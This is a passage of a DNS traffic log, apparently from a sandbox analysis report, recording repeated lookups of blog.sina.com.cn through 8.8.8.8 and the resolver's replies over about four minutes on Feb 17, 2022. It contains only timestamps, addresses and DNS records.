          Feb 17, 2022 20:24:47.848172903 CET5526753192.168.2.58.8.8.8
          Feb 17, 2022 20:24:48.149924040 CET53552678.8.8.8192.168.2.5
          Feb 17, 2022 20:24:52.034387112 CET5476653192.168.2.58.8.8.8
          Feb 17, 2022 20:24:52.053261042 CET53547668.8.8.8192.168.2.5
          Feb 17, 2022 20:24:55.944036007 CET5656253192.168.2.58.8.8.8
          Feb 17, 2022 20:24:56.175182104 CET53565628.8.8.8192.168.2.5
          Feb 17, 2022 20:25:00.303634882 CET5359153192.168.2.58.8.8.8
          Feb 17, 2022 20:25:00.629821062 CET53535918.8.8.8192.168.2.5
          Feb 17, 2022 20:25:03.981631994 CET5603253192.168.2.58.8.8.8
          Feb 17, 2022 20:25:04.001549006 CET53560328.8.8.8192.168.2.5
          Feb 17, 2022 20:25:08.023474932 CET6115053192.168.2.58.8.8.8
          Feb 17, 2022 20:25:08.041820049 CET53611508.8.8.8192.168.2.5
          Feb 17, 2022 20:25:12.089806080 CET6345853192.168.2.58.8.8.8
          Feb 17, 2022 20:25:12.336373091 CET53634588.8.8.8192.168.2.5
          Feb 17, 2022 20:25:16.136531115 CET5042253192.168.2.58.8.8.8
          Feb 17, 2022 20:25:16.158566952 CET53504228.8.8.8192.168.2.5
          Feb 17, 2022 20:25:20.645279884 CET5324753192.168.2.58.8.8.8
          Feb 17, 2022 20:25:20.663877010 CET53532478.8.8.8192.168.2.5
          Feb 17, 2022 20:25:24.752823114 CET5854453192.168.2.58.8.8.8
          Feb 17, 2022 20:25:24.771568060 CET53585448.8.8.8192.168.2.5
          Feb 17, 2022 20:25:28.780366898 CET5381453192.168.2.58.8.8.8
          Feb 17, 2022 20:25:29.013144016 CET53538148.8.8.8192.168.2.5
          Feb 17, 2022 20:25:32.871998072 CET5130553192.168.2.58.8.8.8
          Feb 17, 2022 20:25:32.890717030 CET53513058.8.8.8192.168.2.5
          Feb 17, 2022 20:25:36.898400068 CET5367053192.168.2.58.8.8.8
          Feb 17, 2022 20:25:36.917221069 CET53536708.8.8.8192.168.2.5
          Feb 17, 2022 20:25:40.938633919 CET5516053192.168.2.58.8.8.8
          Feb 17, 2022 20:25:41.252222061 CET53551608.8.8.8192.168.2.5
          Feb 17, 2022 20:25:45.067032099 CET6141453192.168.2.58.8.8.8
          Feb 17, 2022 20:25:45.085952044 CET53614148.8.8.8192.168.2.5
          Feb 17, 2022 20:25:49.043972969 CET6384753192.168.2.58.8.8.8
          Feb 17, 2022 20:25:49.062124968 CET53638478.8.8.8192.168.2.5
          Feb 17, 2022 20:25:53.068669081 CET6152353192.168.2.58.8.8.8
          Feb 17, 2022 20:25:53.087526083 CET53615238.8.8.8192.168.2.5
          Feb 17, 2022 20:25:57.353576899 CET5055153192.168.2.58.8.8.8
          Feb 17, 2022 20:25:57.372282982 CET53505518.8.8.8192.168.2.5
          Feb 17, 2022 20:26:01.139997959 CET6284753192.168.2.58.8.8.8
          Feb 17, 2022 20:26:01.156995058 CET53628478.8.8.8192.168.2.5
          Feb 17, 2022 20:26:05.141797066 CET5771253192.168.2.58.8.8.8
          Feb 17, 2022 20:26:05.160805941 CET53577128.8.8.8192.168.2.5
          Feb 17, 2022 20:26:09.170309067 CET6189153192.168.2.58.8.8.8
          Feb 17, 2022 20:26:09.497654915 CET53618918.8.8.8192.168.2.5
          Feb 17, 2022 20:26:13.163882971 CET6158553192.168.2.58.8.8.8
          Feb 17, 2022 20:26:13.480824947 CET53615858.8.8.8192.168.2.5
          Feb 17, 2022 20:26:17.222548008 CET6516353192.168.2.58.8.8.8
          Feb 17, 2022 20:26:17.239001036 CET53651638.8.8.8192.168.2.5
          Feb 17, 2022 20:26:21.226278067 CET5896953192.168.2.58.8.8.8
          Feb 17, 2022 20:26:21.546710014 CET53589698.8.8.8192.168.2.5
          Feb 17, 2022 20:26:25.313520908 CET5397753192.168.2.58.8.8.8
          Feb 17, 2022 20:26:25.332226038 CET53539778.8.8.8192.168.2.5
          Feb 17, 2022 20:26:29.451911926 CET5714753192.168.2.58.8.8.8
          Feb 17, 2022 20:26:29.770348072 CET53571478.8.8.8192.168.2.5
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          Feb 17, 2022 20:22:56.503609896 CET192.168.2.58.8.8.80xe4e6Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:22:57.484842062 CET192.168.2.58.8.8.80xc6d9Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:01.320740938 CET192.168.2.58.8.8.80xc504Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:05.332601070 CET192.168.2.58.8.8.80x9861Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:09.397387981 CET192.168.2.58.8.8.80x2999Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:13.562412977 CET192.168.2.58.8.8.80x4cb0Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:17.551609993 CET192.168.2.58.8.8.80x801fStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:21.592600107 CET192.168.2.58.8.8.80x1e67Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:25.689045906 CET192.168.2.58.8.8.80x2ea1Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:29.658852100 CET192.168.2.58.8.8.80x2d3cStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:33.902399063 CET192.168.2.58.8.8.80x752dStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:38.045717955 CET192.168.2.58.8.8.80xd7f3Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:41.927798986 CET192.168.2.58.8.8.80x9745Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:46.079430103 CET192.168.2.58.8.8.80xc79cStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:51.401515007 CET192.168.2.58.8.8.80x252fStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:54.518117905 CET192.168.2.58.8.8.80x3b14Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:23:58.709542036 CET192.168.2.58.8.8.80xa3a8Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:02.723436117 CET192.168.2.58.8.8.80x5654Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:07.335109949 CET192.168.2.58.8.8.80xa64aStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:10.779923916 CET192.168.2.58.8.8.80xaa5dStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:14.845992088 CET192.168.2.58.8.8.80x6025Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:18.691988945 CET192.168.2.58.8.8.80xb78bStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:23.020622969 CET192.168.2.58.8.8.80x2ff3Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:27.010618925 CET192.168.2.58.8.8.80x16ffStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:30.955777884 CET192.168.2.58.8.8.80x6526Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:35.032768965 CET192.168.2.58.8.8.80xfe78Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:38.826637030 CET192.168.2.58.8.8.80x5770Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:43.578985929 CET192.168.2.58.8.8.80x5bedStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:47.848172903 CET192.168.2.58.8.8.80x16caStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:52.034387112 CET192.168.2.58.8.8.80x947aStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:24:55.944036007 CET192.168.2.58.8.8.80x5ed3Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:00.303634882 CET192.168.2.58.8.8.80x8392Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:03.981631994 CET192.168.2.58.8.8.80x477eStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:08.023474932 CET192.168.2.58.8.8.80x6de9Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:12.089806080 CET192.168.2.58.8.8.80xb9bbStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:16.136531115 CET192.168.2.58.8.8.80x6e69Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:20.645279884 CET192.168.2.58.8.8.80xf332Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:24.752823114 CET192.168.2.58.8.8.80x3223Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:28.780366898 CET192.168.2.58.8.8.80xbb4Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:32.871998072 CET192.168.2.58.8.8.80x51e7Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:36.898400068 CET192.168.2.58.8.8.80x9feaStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:40.938633919 CET192.168.2.58.8.8.80xfb3cStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:45.067032099 CET192.168.2.58.8.8.80xed3eStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:49.043972969 CET192.168.2.58.8.8.80x7c1Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:53.068669081 CET192.168.2.58.8.8.80x172fStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:25:57.353576899 CET192.168.2.58.8.8.80x9dd2Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:26:01.139997959 CET192.168.2.58.8.8.80x1a3aStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:26:05.141797066 CET192.168.2.58.8.8.80xf763Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:26:09.170309067 CET192.168.2.58.8.8.80x4c4eStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:26:13.163882971 CET192.168.2.58.8.8.80xaf17Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:26:17.222548008 CET192.168.2.58.8.8.80x1529Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:26:21.226278067 CET192.168.2.58.8.8.80xb0d7Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:26:25.313520908 CET192.168.2.58.8.8.80xb869Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          Feb 17, 2022 20:26:29.451911926 CET192.168.2.58.8.8.80x89f8Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          Feb 17, 2022 20:22:56.820297003 CET8.8.8.8192.168.2.50xe4e6No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:22:56.820297003 CET8.8.8.8192.168.2.50xe4e6No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:22:57.803123951 CET8.8.8.8192.168.2.50xc6d9No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:22:57.803123951 CET8.8.8.8192.168.2.50xc6d9No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:01.640818119 CET8.8.8.8192.168.2.50xc504No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:01.640818119 CET8.8.8.8192.168.2.50xc504No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:05.654016018 CET8.8.8.8192.168.2.50x9861No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:05.654016018 CET8.8.8.8192.168.2.50x9861No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:09.416057110 CET8.8.8.8192.168.2.50x2999No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:09.416057110 CET8.8.8.8192.168.2.50x2999No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:13.881606102 CET8.8.8.8192.168.2.50x4cb0No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:13.881606102 CET8.8.8.8192.168.2.50x4cb0No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:17.568496943 CET8.8.8.8192.168.2.50x801fNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:17.568496943 CET8.8.8.8192.168.2.50x801fNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:21.611524105 CET8.8.8.8192.168.2.50x1e67No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:21.611524105 CET8.8.8.8192.168.2.50x1e67No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:25.707355022 CET8.8.8.8192.168.2.50x2ea1No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:25.707355022 CET8.8.8.8192.168.2.50x2ea1No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:29.900372028 CET8.8.8.8192.168.2.50x2d3cNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:29.900372028 CET8.8.8.8192.168.2.50x2d3cNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:33.921515942 CET8.8.8.8192.168.2.50x752dNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:33.921515942 CET8.8.8.8192.168.2.50x752dNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:38.064519882 CET8.8.8.8192.168.2.50xd7f3No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:38.064519882 CET8.8.8.8192.168.2.50xd7f3No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:41.946727037 CET8.8.8.8192.168.2.50x9745No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:41.946727037 CET8.8.8.8192.168.2.50x9745No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:46.096263885 CET8.8.8.8192.168.2.50xc79cNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:46.096263885 CET8.8.8.8192.168.2.50xc79cNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:51.420788050 CET8.8.8.8192.168.2.50x252fNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:51.420788050 CET8.8.8.8192.168.2.50x252fNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:54.534945965 CET8.8.8.8192.168.2.50x3b14No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:54.534945965 CET8.8.8.8192.168.2.50x3b14No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:23:58.728400946 CET8.8.8.8192.168.2.50xa3a8No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:23:58.728400946 CET8.8.8.8192.168.2.50xa3a8No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:02.740253925 CET8.8.8.8192.168.2.50x5654No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:02.740253925 CET8.8.8.8192.168.2.50x5654No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:07.662615061 CET8.8.8.8192.168.2.50xa64aNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:07.662615061 CET8.8.8.8192.168.2.50xa64aNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:11.099441051 CET8.8.8.8192.168.2.50xaa5dNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:11.099441051 CET8.8.8.8192.168.2.50xaa5dNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:15.167742014 CET8.8.8.8192.168.2.50x6025No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:15.167742014 CET8.8.8.8192.168.2.50x6025No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:18.708914042 CET8.8.8.8192.168.2.50xb78bNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:18.708914042 CET8.8.8.8192.168.2.50xb78bNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:23.340293884 CET8.8.8.8192.168.2.50x2ff3No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:23.340293884 CET8.8.8.8192.168.2.50x2ff3No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:27.027789116 CET8.8.8.8192.168.2.50x16ffNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:27.027789116 CET8.8.8.8192.168.2.50x16ffNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:31.272394896 CET8.8.8.8192.168.2.50x6526No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:31.272394896 CET8.8.8.8192.168.2.50x6526No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:35.049979925 CET8.8.8.8192.168.2.50xfe78No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:35.049979925 CET8.8.8.8192.168.2.50xfe78No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:38.845635891 CET8.8.8.8192.168.2.50x5770No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:38.845635891 CET8.8.8.8192.168.2.50x5770No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:43.597493887 CET8.8.8.8192.168.2.50x5bedNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:43.597493887 CET8.8.8.8192.168.2.50x5bedNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:48.149924040 CET8.8.8.8192.168.2.50x16caNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:48.149924040 CET8.8.8.8192.168.2.50x16caNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:52.053261042 CET8.8.8.8192.168.2.50x947aNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:52.053261042 CET8.8.8.8192.168.2.50x947aNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:24:56.175182104 CET8.8.8.8192.168.2.50x5ed3No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:24:56.175182104 CET8.8.8.8192.168.2.50x5ed3No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:00.629821062 CET8.8.8.8192.168.2.50x8392No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:00.629821062 CET8.8.8.8192.168.2.50x8392No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:04.001549006 CET8.8.8.8192.168.2.50x477eNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:04.001549006 CET8.8.8.8192.168.2.50x477eNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:08.041820049 CET8.8.8.8192.168.2.50x6de9No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:08.041820049 CET8.8.8.8192.168.2.50x6de9No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:12.336373091 CET8.8.8.8192.168.2.50xb9bbNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:12.336373091 CET8.8.8.8192.168.2.50xb9bbNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:16.158566952 CET8.8.8.8192.168.2.50x6e69No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:16.158566952 CET8.8.8.8192.168.2.50x6e69No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:20.663877010 CET8.8.8.8192.168.2.50xf332No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:20.663877010 CET8.8.8.8192.168.2.50xf332No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:24.771568060 CET8.8.8.8192.168.2.50x3223No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:24.771568060 CET8.8.8.8192.168.2.50x3223No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:29.013144016 CET8.8.8.8192.168.2.50xbb4No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:29.013144016 CET8.8.8.8192.168.2.50xbb4No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:32.890717030 CET8.8.8.8192.168.2.50x51e7No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:32.890717030 CET8.8.8.8192.168.2.50x51e7No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:36.917221069 CET8.8.8.8192.168.2.50x9feaNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:36.917221069 CET8.8.8.8192.168.2.50x9feaNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:41.252222061 CET8.8.8.8192.168.2.50xfb3cNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:41.252222061 CET8.8.8.8192.168.2.50xfb3cNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:45.085952044 CET8.8.8.8192.168.2.50xed3eNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:45.085952044 CET8.8.8.8192.168.2.50xed3eNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:49.062124968 CET8.8.8.8192.168.2.50x7c1No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:49.062124968 CET8.8.8.8192.168.2.50x7c1No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:53.087526083 CET8.8.8.8192.168.2.50x172fNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:53.087526083 CET8.8.8.8192.168.2.50x172fNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:25:57.372282982 CET8.8.8.8192.168.2.50x9dd2No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:25:57.372282982 CET8.8.8.8192.168.2.50x9dd2No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:26:01.156995058 CET8.8.8.8192.168.2.50x1a3aNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:26:01.156995058 CET8.8.8.8192.168.2.50x1a3aNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:26:05.160805941 CET8.8.8.8192.168.2.50xf763No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:26:05.160805941 CET8.8.8.8192.168.2.50xf763No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:26:09.497654915 CET8.8.8.8192.168.2.50x4c4eNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:26:09.497654915 CET8.8.8.8192.168.2.50x4c4eNo error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:26:13.480824947 CET8.8.8.8192.168.2.50xaf17No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:26:13.480824947 CET8.8.8.8192.168.2.50xaf17No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:26:17.239001036 CET8.8.8.8192.168.2.50x1529No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:26:17.239001036 CET8.8.8.8192.168.2.50x1529No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:26:21.546710014 CET8.8.8.8192.168.2.50xb0d7No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:26:21.546710014 CET8.8.8.8192.168.2.50xb0d7No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:26:25.332226038 CET8.8.8.8192.168.2.50xb869No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
          Feb 17, 2022 20:26:25.332226038 CET8.8.8.8192.168.2.50xb869No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)
          Feb 17, 2022 20:26:29.770348072 CET8.8.8.8192.168.2.50x89f8No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)
